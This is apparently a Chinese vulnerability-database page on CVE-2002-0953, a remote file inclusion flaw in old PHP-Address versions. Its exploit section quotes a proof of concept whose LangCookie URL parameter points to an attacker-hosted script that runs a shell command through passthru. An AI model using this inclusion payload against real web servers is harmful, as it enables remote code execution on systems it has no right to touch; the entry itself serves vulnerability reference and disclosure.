PHP Address PHP allow_url_fopen和register_globals globals.php代码执行漏洞

PHP Address PHP allow_url_fopen和register_globals globals.php代码执行漏洞

漏洞ID 1106806 漏洞类型 未知
发布时间 2002-06-17 更新时间 2005-05-02
图片[1]-PHP Address PHP allow_url_fopen和register_globals globals.php代码执行漏洞-安全小百科CVE编号 CVE-2002-0953
图片[2]-PHP Address PHP allow_url_fopen和register_globals globals.php代码执行漏洞-安全小百科CNNVD-ID CNNVD-200210-114
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21564
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200210-114
|漏洞详情
启用PHPallow_url_fopen和register_globals变量的PHPAddress0.2f之前版本的globals.php存在漏洞。远程攻击者可以借助LangCookie参数代码执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/5039/info

PHP-Address is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. 

http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
(the .php3 is already there look at line 5 in global.php3)

Remote script located on MYSERVER:

------------x.php3------------
<?
passthru("/bin/ls /");
?>
-------------------------------

Outputs a directory listing.
|参考资料

来源:BID
名称:5039
链接:http://www.securityfocus.com/bid/5039
来源:XF
名称:phpaddress-include-remote-files(9379)
链接:http://www.iss.net/security_center/static/9379.php
来源:BUGTRAQ
名称:20020619SourceInjectionintoPHPAddress
链接:http://online.securityfocus.com/archive/1/277987
来源:BUGTRAQ
名称:20020617PHPsourceinjectioninPHPAddress
链接:http://archives.neohapsis.com/archives/bugtraq/2002-06/0182.html

相关推荐: File Sharing for Net Directory Traversal File Disclosure Vulnerability

File Sharing for Net Directory Traversal File Disclosure Vulnerability 漏洞ID 1099579 漏洞类型 Input Validation Error 发布时间 2003-08-30 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享